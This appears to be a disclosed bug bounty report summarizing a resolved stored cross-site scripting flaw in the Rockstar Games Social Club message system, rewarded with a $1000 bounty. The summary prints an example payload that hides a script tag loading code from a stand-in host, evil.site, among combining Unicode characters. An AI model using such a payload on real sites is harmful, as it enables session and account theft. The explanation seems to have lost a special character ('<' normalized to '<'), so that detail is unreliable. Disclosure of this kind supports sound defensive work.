The return of the <
High
R
Rockstar Games
Submitted None
Team Summary
Official summary from Rockstar Games
In this report, the researcher was able to demonstrate a Stored XSS vulnerability in our Message system on the Social Club website. By taking advantage of the fact that '<' characters are normalized to '<', as well as discovering improper escaping of the aforementioned '<' character, the researcher was able to craft a payload to perform XSS attacks. An example payload: =[̕h+͓.<script/src=//evil.site/poc.js>.͓̮̮ͅ=sW&͉̹̻͙̫̦̮̲͏̼̝̫́̕
Actions:
Reported by
alexbirsan
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Submitted
Weakness
Cross-site Scripting (XSS) - Stored